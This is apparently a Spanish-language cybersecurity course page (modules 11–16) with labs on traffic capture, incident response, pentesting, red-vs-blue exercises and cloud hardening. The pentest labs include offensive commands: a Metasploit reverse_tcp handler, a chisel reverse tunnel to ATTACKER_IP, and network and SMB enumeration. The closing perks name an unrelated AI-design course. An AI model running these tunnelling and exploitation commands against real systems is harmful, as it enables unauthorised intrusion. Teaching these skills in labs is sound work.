Ahora dominas los fundamentos del análisis forense digital: preservar, adquirir y examinar evidencias sin alterar su integridad. Esto te permitirá integrarte en equipos de respuesta a incidentes y colaborar con procesos legales y auditorías técnicas.

🏛️ Módulo 11: Análisis de Tráfico Avanzado

En este módulo aprenderás a capturar, filtrar y analizar tráfico de red utilizando herramientas avanzadas como Wireshark y tcpdump. Trabajaremos con escenarios controlados para detectar patrones de ataque, identificar fugas de información y validar configuraciones de seguridad.

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

📚 Marco Teórico

El análisis de tráfico es esencial para la detección de intrusiones, resolución de problemas y auditorías de seguridad. Wireshark ofrece un entorno gráfico para inspeccionar paquetes en detalle, mientras que tcpdump es ideal para capturas rápidas o entornos sin interfaz gráfica.

🛠️ Laboratorio 1 — Captura básica de tráfico


        # Instalar tcpdump si no está presente
        sudo apt update && sudo apt install -y tcpdump

        # Capturar 100 paquetes en la interfaz eth0
        sudo tcpdump -i eth0 -c 100 -w captura.pcap
      

        # Descargar e instalar Wireshark desde https://www.wireshark.org
        # Capturar tráfico en la interfaz deseada y guardar en un archivo .pcap
      

🕵️‍♂️ Laboratorio 2 — Filtros avanzados en Wireshark

📋 Trabajo Práctico del Módulo 11

📦 Instrucciones de Entrega

Realiza una captura de tráfico de al menos 5 minutos en un entorno controlado y documenta:

  1. Protocolo más utilizado.
  2. Top 5 de IPs origen/destino.
  3. Posibles eventos sospechosos (justifica).

📦 Formato de Entrega


    modulo11_Apellido_Nombre.zip
    ├── captura.pcap
    ├── analisis.pdf
    └── resumen.txt
  

📏 Rúbrica

✅ Checklist

🔒 Notas Éticas

📘 Conexión con Estándares (Contexto Professional)

Este módulo se alinea con NIST CSF (DE.CM-1, DE.CM-7) y ISO/IEC 27002 (monitorización y análisis de eventos).

🚀 Cierre del Módulo

Ahora dominas la captura y análisis de tráfico para detectar incidentes y validar la seguridad de tu red. En el siguiente módulo aplicarás estos conocimientos para crear alertas y automatizar la detección.

🏛️ Módulo 12: Gestión de Incidentes Avanzada

En este módulo profundizaremos en la respuesta ante incidentes de ciberseguridad, integrando análisis forense, coordinación de equipos y comunicación efectiva con stakeholders. Aprenderás a manejar incidentes críticos, priorizar recursos y documentar cada fase del ciclo.

🧰 Prerrequisitos del laboratorio

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

🛠️ Laboratorio — Simulación de incidente crítico

Fundamento: Practicar la coordinación y respuesta rápida en incidentes reales.

  1. Utiliza un entorno de laboratorio (VM o simulador) con un SIEM configurado.
  2. Genera alertas simuladas (p. ej., intentos de acceso no autorizado, malware detectado).
  3. Clasifica el incidente según severidad y tipo.
  4. Ejecuta acciones de contención y erradicación documentando cada paso.
  5. Exporta un informe con línea de tiempo, acciones y resultados.

📋 Trabajo Práctico del Módulo 12

  1. Preparar un procedimiento documentado para la gestión de un incidente crítico.
  2. Simular un incidente y registrar la respuesta (capturas y logs).
  3. Entregar un informe final con:
    • Descripción del incidente
    • Indicadores de compromiso detectados
    • Acciones realizadas y responsables
    • Resultados y recomendaciones

📦 Formato de Entrega

Sube un archivo modulo12_Apellido_Nombre.zip con:

modulo12_Apellido_Nombre.zip
    ├─ procedimiento_incidente.pdf
    ├─ simulacion/
    │  ├─ capturas/
    │  └─ logs/
    └─ informe_final.pdf

📏 Rúbrica de Evaluación

✅ Checklist de Calidad

⚠️ Notas éticas y accesibilidad

📘 Conexión con Estándares (contexto profesional)

Este módulo está alineado con ISO/IEC 27035 (Gestión de incidentes de seguridad de la información), NIST SP 800-61 (Computer Security Incident Handling Guide) y el pilar Respond del NIST Cybersecurity Framework.

🚀 Cierre del Módulo

Con este módulo, estarás preparado para liderar la gestión de incidentes complejos, minimizando el impacto y fortaleciendo la resiliencia de la organización.

🏛️ Módulo 13: Pruebas de Penetración Avanzadas (Pentesting Pro)

En este módulo llevarás tus habilidades ofensivas al siguiente nivel aplicando metodologías formales (PTES/OSSTMM), técnicas de pivoting y post-explotación en entornos controlados. Practicarás desde el reconocimiento profundo hasta la elaboración de un informe ejecutivo y técnico con evidencias reproducibles.

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

🧰 Prerrequisitos del laboratorio

🛠️ Laboratorio 1 — Reconocimiento y mapeo de superficie


        # Descubrimiento inicial (TCP SYN + detección de versiones) en laboratorio
        sudo nmap -sS -sV -O -T3 -p- 10.10.0.0/24 -oA recon_inicial

        # Fuzzing de contenido web (si aplica)
        feroxbuster -u http://10.10.0.15 -w /usr/share/wordlists/dirb/common.txt -o ferox_10.10.0.15.txt
      

        # Verificar conectividad y puertos comunes desde Windows (laboratorio)
        Test-NetConnection 10.10.0.15 -Port 80
        Test-NetConnection 10.10.0.15 -Port 445

        # Enumeración básica de recursos compartidos (autorizado)
        Get-SmbShare -CimSession 10.10.0.15
      

🛠️ Laboratorio 2 — Explotación controlada y obtención de acceso

  1. Identifica un objetivo de prueba dentro del rango del laboratorio y valida versión/servicio.
  2. Usa un flujo seguro (por ejemplo, Metasploit con módulos de prueba o PoC no destructivos) y registra cada acción.
  3. Obtén una sesión de prueba (shell limitada) y documenta usuario/privilegios y restricciones.

        # Ejemplo de flujo con Metasploit (laboratorio)
        msfconsole -q -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 10.10.0.15; run; exit"

        # Túnel simple para prueba de pivoting con chisel (lab)
        # En atacante:
        chisel server -p 9001 --reverse
        # En host intermedio (comprometido de laboratorio):
        chisel client ATTACKER_IP:9001 R:1080:socks
        # Luego enruta herramientas a través de SOCKS con proxychains
        proxychains nmap -sT -Pn 10.20.0.0/24 -oA pivot_scan
      

        # Verificar privilegios y contexto en una sesión de prueba
        whoami /priv
        ipconfig /all

        # Túnel de laboratorio con sshuttle (desde WSL o Linux auxiliar)
        # sshuttle -r usuario@10.10.0.15 10.20.0.0/24
      

🛠️ Laboratorio 3 — Post-explotación segura y enumeración


        # Enumeración de servicios y compartidos (lab)
        crackmapexec smb 10.10.0.0/24 --shares

        # Grafo de relaciones AD (si tu lab incluye AD)
        # Ingerir datos con SharpHound y analizarlos en BloodHound/Neo4j
  

⚠️ Errores Comunes

📋 Trabajo Práctico del Módulo 13

📦 Instrucciones de Entrega

  1. Planifica un pentest de laboratorio (alcance, objetivos, limitaciones, OPSEC).
  2. Ejecuta reconocimiento, explotación controlada y un pivoting sencillo entre subredes del lab.
  3. Realiza post-explotación no destructiva y reúne evidencias (capturas, comandos, hashes).
  4. Entrega dos informes: uno técnico detallado y uno ejecutivo con riesgos y recomendaciones.

📦 Formato de Entrega

modulo13_Apellido_Nombre.zip
    ├─ plan/
    │  └─ alcance_ROE.pdf
    ├─ evidencia/
    │  ├─ recon_inicial.nmap
    │  ├─ ferox_*.txt
    │  ├─ pivot_scan.nmap
    │  └─ capturas/
    ├─ comandos/
    │  └─ historial.txt
    └─ informes/
    ├─ informe_tecnico.pdf
    └─ informe_ejecutivo.pdf

📏 Rúbrica de Evaluación

✅ Checklist de Entrega

🔒 Notas éticas y accesibilidad

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con PTES, OSSTMM y con CIS Controls v8 (Control 18: Pruebas de Penetración).

🚀 Cierre del Módulo

Ahora cuentas con un flujo de pentesting profesional en un entorno seguro. En el próximo módulo abordarás Red Team vs Blue Team para integrar ejercicios adversariales y defensa activa.

🏛️ Módulo 14: Red Team vs Blue Team — Ejercicios Adversariales y Defensa Activa

En este módulo aprenderás cómo se desarrollan y ejecutan ejercicios de Red Team (ataque simulado) y Blue Team (defensa activa) en un entorno controlado. Pondrás en práctica tácticas ofensivas y defensivas, fomentando la colaboración y el aprendizaje bidireccional para fortalecer la postura de seguridad de la organización.

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

🧰 Prerrequisitos del laboratorio

🛠️ Laboratorio 1 — Ejercicio Red Team

  1. Revisar el ROE y confirmar objetivos con el Blue Team.
  2. Realizar reconocimiento de la red objetivo dentro del alcance.
  3. Ejecutar explotación controlada y demostrar acceso sin causar daño.
  4. Registrar comandos, resultados y evidencias.

        # Escaneo controlado
        nmap -sV -T3 -p- 10.10.50.0/24 -oA redteam_scan

        # Explotación de prueba (ejemplo en laboratorio)
        msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; run"
      

        # Monitoreo de eventos en tiempo real con Wazuh
        tail -f /var/ossec/logs/alerts/alerts.json | jq '.rule.description'

        # Análisis de tráfico sospechoso con Wireshark
        wireshark -i eth0
      

🛠️ Laboratorio 2 — Ejercicio Blue Team

  1. Identificar actividad sospechosa generada por el Red Team.
  2. Correlacionar eventos con datos de SIEM y análisis de tráfico.
  3. Responder aplicando reglas de firewall, aislamiento o bloqueo según el ROE.
  4. Generar un informe con hallazgos y acciones tomadas.

⚠️ Errores Comunes

📋 Trabajo Práctico del Módulo 14

  1. Definir el ROE y el alcance del ejercicio Red vs Blue.
  2. Ejecutar el ejercicio siguiendo las fases planificadas.
  3. Documentar acciones, evidencias y métricas de detección y respuesta.
  4. Elaborar un informe conjunto con mejoras propuestas.

📦 Formato de Entrega

modulo14_Apellido_Nombre.zip
    ├─ roe.pdf
    ├─ evidencias/
    │  ├─ redteam/
    │  └─ blueteam/
    └─ informe_final.pdf

📏 Rúbrica de Evaluación

✅ Checklist de Entrega

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con NIST SP 800-84 (Guide to Test, Training, and Exercise Programs), MITRE ATT&CK Framework y el pilar Respond & Recover del NIST Cybersecurity Framework.

🚀 Cierre del Módulo

Con la experiencia en Red Team y Blue Team, estás listo para participar en simulaciones avanzadas y mejorar continuamente las defensas de cualquier entorno.

🏛️ Módulo 15: Seguridad en la Nube y DevSecOps

En este módulo aprenderás a proteger entornos en la nube (AWS, Azure, GCP) y a integrar la seguridad en todo el ciclo de desarrollo (DevSecOps). Verás cómo aplicar controles preventivos, monitoreo continuo y automatización de seguridad en pipelines CI/CD, asegurando que las aplicaciones y datos estén protegidos desde la fase de diseño hasta la producción.

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

🧰 Prerrequisitos del laboratorio


🛠️ Laboratorio 1 — Configuración segura de IAM y redes


        # Crear usuario con permisos limitados
        aws iam create-user --user-name usuario-lab
        aws iam attach-user-policy --user-name usuario-lab --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

        # Crear VPC y restringir acceso SSH solo a IPs específicas
        aws ec2 create-security-group --group-name SG-Lab --description "SSH solo desde admin"
        aws ec2 authorize-security-group-ingress --group-name SG-Lab --protocol tcp --port 22 --cidr 203.0.113.0/24
      

        # Crear grupo de recursos y usuario con rol limitado
        az group create --name RG-Lab --location eastus
        az ad user create --display-name "UsuarioLab" --user-principal-name usuario.lab@dominio.onmicrosoft.com --password 'ContraseñaSegura123'

        # Crear NSG y permitir solo SSH desde IP segura
        az network nsg create --resource-group RG-Lab --name NSG-Lab
        az network nsg rule create --resource-group RG-Lab --nsg-name NSG-Lab --name SSH-Allow \
        --priority 100 --source-address-prefixes 203.0.113.0/24 --destination-port-ranges 22 --access Allow --protocol Tcp --direction Inbound
      

        # Crear cuenta de servicio con permisos mínimos
        gcloud iam service-accounts create sa-lab --display-name "Cuenta Servicio Lab"
        gcloud projects add-iam-policy-binding $PROJECT_ID --member="serviceAccount:sa-lab@$PROJECT_ID.iam.gserviceaccount.com" --role="roles/storage.objectViewer"

        # Regla de firewall para permitir SSH desde IP segura
        gcloud compute firewall-rules create allow-ssh-admin --allow tcp:22 --source-ranges 203.0.113.0/24
      

🔐 Laboratorio 2 — Cifrado y protección de datos

  1. Configura un bucket o contenedor de almacenamiento con cifrado por defecto (KMS).
  2. Sube un archivo de prueba y verifica su estado de cifrado.
  3. Implementa versionado para prevenir pérdida de datos.

        # Crear bucket con cifrado SSE-KMS
        aws s3api create-bucket --bucket lab-bucket --region us-east-1
        aws s3api put-bucket-encryption --bucket lab-bucket --server-side-encryption-configuration '{
            "Rules": [{
                "ApplyServerSideEncryptionByDefault": { "SSEAlgorithm": "aws:kms" }
            }]
        }'
      

        # Crear cuenta de almacenamiento con cifrado por defecto
        az storage account create --name almacenlab --resource-group RG-Lab --location eastus --sku Standard_LRS --encryption-services blob
      

        # Crear bucket con cifrado por KMS
        gcloud storage buckets create lab-bucket --encryption-key=projects/$PROJECT_ID/locations/global/keyRings/my-keyring/cryptoKeys/my-key
      

⚙️ Laboratorio 3 — Seguridad en CI/CD (DevSecOps)

  1. Configura un pipeline que incluya escaneo de infraestructura como código (IaC) con tfsec o Checkov.
  2. Agrega análisis de contenedores con Trivy.
  3. Configura notificaciones en caso de hallazgos críticos.

    # Ejemplo GitHub Actions
    name: DevSecOps Pipeline
    on: [push]
    jobs:
    security-scan:
        runs-on: ubuntu-latest
        steps:
        - uses: actions/checkout@v2
        - name: Scan IaC with tfsec
            run: |
            curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install.sh | bash
            ./tfsec .
        - name: Scan containers with Trivy
            run: |
            curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh
            ./trivy image my-app:latest
  

⚠️ Errores Comunes


📋 Trabajo Práctico del Módulo 15

📦 Instrucciones de Entrega

  1. Configura un entorno seguro en AWS/Azure/GCP con IAM, red y cifrado.
  2. Implementa un pipeline con escaneo IaC y contenedores.
  3. Documenta hallazgos y mejoras aplicadas.

📦 Formato de Entrega

modulo15_Apellido_Nombre.zip
    ├─ configuracion_cloud/
    │  ├─ iam.txt
    │  ├─ firewall.txt
    │  └─ cifrado.txt
    ├─ pipeline/
    │  ├─ pipeline.yml
    │  └─ resultados_scans.txt
    └─ informe/
    └─ informe_cloud.pdf

📏 Rúbrica de Evaluación


📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27017 (Seguridad en la nube), ISO/IEC 27018 (Protección de datos personales en la nube), NIST SP 800-190 (Application Container Security Guide) y OWASP SAMM (Software Assurance Maturity Model).

🚀 Cierre del Módulo

Con este módulo podrás implementar y mantener entornos cloud seguros y automatizados, integrando la seguridad en todo el ciclo de desarrollo. El próximo módulo cerrará la formación con Proyecto Final y Evaluación Integral.

🏛️ Módulo 16: Proyecto Final Integrador

Cierre del recorrido de 0 a master. Integrarás ofensiva (Red Team), defensa (Blue Team) y forense en un único caso realista, midiendo tu efectividad con métricas operativas. El objetivo es demostrar manejo técnico, metodología y comunicación ejecutiva.


🎭 Fase 0 — Historia del Caso (Contexto Narrativo)

TechCorp (empresa ficticia de SaaS) reporta alertas anómalas en el SIEM: intentos de autenticación fallidos y actividad sospechosa en una VM de aplicaciones. Tu equipo debe:

  1. Red Team (lab): Simular al actor con alcance y reglas de compromiso definidas.
  2. Blue Team (lab): Detección, contención, erradicación y recuperación con registro completo.
  3. Forense (lab): Adquisición de evidencia (disco/memoria) y análisis con herramientas libres.

Alcance de laboratorio sugerido: 2 subredes (DMZ: web/app; LAN: AD/DB), 1 host atacante (Kali/Parrot), 3 VMs objetivo (Web, Win Server AD, Linux App), SIEM (p. ej., Wazuh/Graylog), IDS/NDR (Suricata/Zeek).


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio


🛠️ Laboratorio 1 — Plan & Reglas de Compromiso (ROE) + Reconocimiento

Fundamento: Sin alcance claro y ROE, no hay pentest profesional.


🛠️ Laboratorio 2 — Red Team vs Blue Team (Ataque/Detección/Contención)

Fundamento: Ejercicio adversarial controlado con medidas de seguridad y reversión.


🛠️ Laboratorio 3 — Forense: Adquisición y Análisis


🛠️ Laboratorio 4 — Métricas, Validación y Lecciones Aprendidas

Fundamento: No se mejora lo que no se mide.


📋 Trabajo Práctico del Módulo 16

📦 Instrucciones de Entrega

  1. Diseña el ejercicio (ROE, alcance, arquitectura de lab y plan de pruebas).
  2. Ejecuta Red vs Blue + Forense con registro de evidencias y tiempos.
  3. Mide MTTD/MTTR e incluye indicadores de efectividad de controles.
  4. Entrega informe técnico, informe ejecutivo y presentación de defensa.

📦 Formato de Entrega

modulo16_Apellido_Nombre.zip
├─ plan/
│  ├─ alcance_ROE.pdf
│  └─ arquitectura_lab.png
├─ evidencias/
│  ├─ recon_*.nmap
│  ├─ ferox_*.txt
│  ├─ pivot_*.nmap
│  ├─ siem_alertas.csv
│  ├─ ids_events.json
│  └─ capturas/
├─ forense/
│  ├─ hash.txt
│  ├─ imagen_sdb.dd (o E01)   # (si pesa mucho, incluir hash + ruta privada)
│  ├─ memoria.raw (idem nota)
│  └─ analisis_autopsy_volatility.pdf
├─ timelines/
│  ├─ timeline_incidente.csv
│  └─ mttd_mttr.xlsx
└─ informes/
   ├─ informe_tecnico.pdf
   ├─ informe_ejecutivo.pdf
   └─ presentacion_defensa.pdf

📏 Rúbrica de Evaluación

✅ Checklist de Calidad

🔒 Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

Alineado con PTES/OSSTMM (pruebas de intrusión), ISO/IEC 27035 (gestión de incidentes), NIST SP 800-61 (Incident Handling), ISO/IEC 27037 (evidencia digital), y CIS Controls v8 (8, 13, 17, 18).

🚀 Cierre del Módulo

Este proyecto sintetiza tu dominio técnico y metodológico. Al completarlo, podrás planificar, ejecutar, detectar, responder y analizar incidentes complejos con comunicación clara hacia equipos técnicos y ejecutivos — el sello de un profesional de ciberseguridad de nivel avanzado.

📚 Anexos y Recursos Extra

Esta sección reúne materiales adicionales que complementan los módulos del curso. Incluye glosarios, plantillas, guías rápidas y enlaces a herramientas para seguir aprendiendo y practicando.

📖 Glosario de Términos Clave

🗂️ Plantillas Descargables

🛠️ Herramientas Recomendadas

🎓 Recursos para Certificaciones

💡 Consejos Finales

⬇️ Descargar Paquete de Recursos

Consejo: La clave para crecer en ciberseguridad es la práctica constante y la curiosidad por aprender más allá de lo básico.


❓ Preguntas Frecuentes

En esta sección encontrarás respuestas a las dudas más comunes sobre el curso, los contenidos, la metodología y el uso de las herramientas. Si tu pregunta no está aquí, siempre puedes consultar en la comunidad o al equipo de soporte.

📌 Sobre el Curso

⚙️ Sobre el Contenido Técnico

📄 Sobre la Evaluación

🛡️ Sobre la Seguridad y la Ética

📬 ¿Aún tienes dudas?

Puedes contactarnos en soporte@ciberseguridadmaster.com o acceder al espacio de comunidad para preguntar directamente a instructores y compañeros.

Consejo: Antes de preguntar, revisa el glosario y los anexos; muchas veces la respuesta está ahí y aprendes algo extra en el camino.


🏅 Obtén tu Certificado Profesional

Este beneficio se desbloquea al completar el curso.

🏅 Obtén tu Certificado Profesional

¡Felicidades! Has completado el Curso Definitivo de Diseño con IA. Solicita tu certificado oficial que valida tus habilidades.

🛠️ Kit de Herramientas IA Secretas y Actualizaciones Beta

Este beneficio se desbloquea al publicar un testimonio.

🛠️ Kit de Herramientas IA Secretas y Actualizaciones Beta

Accede a un listado curado de herramientas IA emergentes y recibe invitaciones a pruebas beta de nuevas funciones antes que nadie.

📈 Licencia de Reventa del Curso (¡Gana Dinero!)

Este beneficio se desbloquea al traer 1 referido.

📈 Licencia de Reventa del Curso (¡Gana Dinero!)

Desbloquea la licencia para revender este mismo curso y quedarte con el 100% de las ganancias. ¡Expande tu negocio!

💬 Soporte Premium Directo por WhatsApp

Este beneficio se desbloquea al conseguir 2 referidos.

💬 Soporte Premium Directo por WhatsApp

Obtén atención personalizada y soporte prioritario de nuestro equipo experto para todas tus dudas y proyectos.